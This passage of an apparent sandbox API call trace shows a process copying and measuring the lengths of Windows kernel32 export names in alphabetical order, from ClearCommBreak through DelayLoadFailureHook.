lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.181] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.181] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.181] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.181] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.181] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.181] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.181] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.181] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.181] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.181] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.182] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.182] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.182] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.182] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.182] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.182] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.182] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.182] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.182] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.182] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.182] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.182] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.182] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.182] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.182] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.182] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.182] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.182] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.182] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.182] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.183] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.183] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.183] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.183] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.183] lstrlenA (lpString="COPYFILEA") returned 9 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.183] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.183] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.183] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.183] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.183] lstrlenA (lpString="COPYFILEW") returned 9 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.183] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.183] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.183] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.183] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.183] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.183] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.183] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.183] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.184] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.184] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.184] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.184] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.184] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.184] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.184] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.184] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.184] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.184] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.184] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.184] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.184] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.184] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.184] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.185] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.185] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.185] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.185] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.185] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.185] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.185] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.185] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.185] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.185] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.185] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.185] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.185] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.185] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.185] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.185] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.185] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.185] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.185] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.186] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.186] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.186] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.186] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.186] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.186] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.186] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.186] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.186] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.186] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.186] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.186] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.186] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.186] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.186] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.186] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.186] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.186] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.186] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.186] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.187] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.187] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.187] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.187] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.187] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.187] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.187] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.187] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.187] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.187] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.187] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.187] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.187] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.187] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.187] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.187] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.187] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.187] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.187] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.188] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.188] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.188] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.188] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.188] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.188] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.188] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.188] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.188] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.188] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.188] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.188] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.188] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, 